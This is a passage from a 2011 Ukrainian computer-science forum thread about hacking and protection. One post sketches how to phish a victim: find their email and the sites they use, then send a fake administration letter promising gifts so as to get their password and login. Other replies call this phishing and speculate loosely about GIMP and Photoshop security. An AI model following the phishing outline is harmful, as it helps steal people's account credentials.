А як підсунуть жертві це вже інша поема ;) берем мило жертви дивимось де вона шариця найбільше тобіш по яких сайтах можна даже mail.ru пишем листа від імені адміністрації що ви отримали подарунки на мій світ або іншу лажу як ітог маєм і пароль з логом жертви і віря в жертви на компі B)
Andrey123q Дата: Пн, 10.01.2011, 20:16 | Повідомлення № 28
Досвідчений учасник
Повідомлень: 1236
Нагороди: 3
Рейтинг: 84
По другому еще называется фишинг. http://ru.wikipedia.org/wiki/Фишинг
volevikt Дата: Вт, 11.01.2011, 14:27 | Повідомлення № 29
Перспективна вчителька
Повідомлень: 1800
Нагороди: 24
Рейтинг: 199
Круто-круто!
Сама вразлива частина ППЗ для комп'ютерної безпеки - Гімп. :o
Цікаво, а Фотошоп на 100% захищений від проникання зловмисників?
НІКОЛЯ Дата: Вт, 11.01.2011, 14:41 | Повідомлення № 30
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Quote (volevikt)
Цікаво, а Фотошоп на 100% захищений від проникання зловмисників?

Захищений але теж неповністтю. :?
Форум інформатиків » РОЗДІЛ ІХ: ІНТЕРНЕТ, МЕРЕЖІ, ХОСТІНГ » 9.8 Рубрика системного адміністратора » ЗАХИСТ ТА ПРИКЛАДИ ВЗЛОМУ ВСЬОГО ЧОГО ТІЛЬКИ МОЖЛИВО. (ФОРМАТ ОБГОВОРЕННЯ ВІЛЬНИЙ)
Сторінка 2 з 3«123»
Пошук:


© Форум інформатиків України, 2007-2017.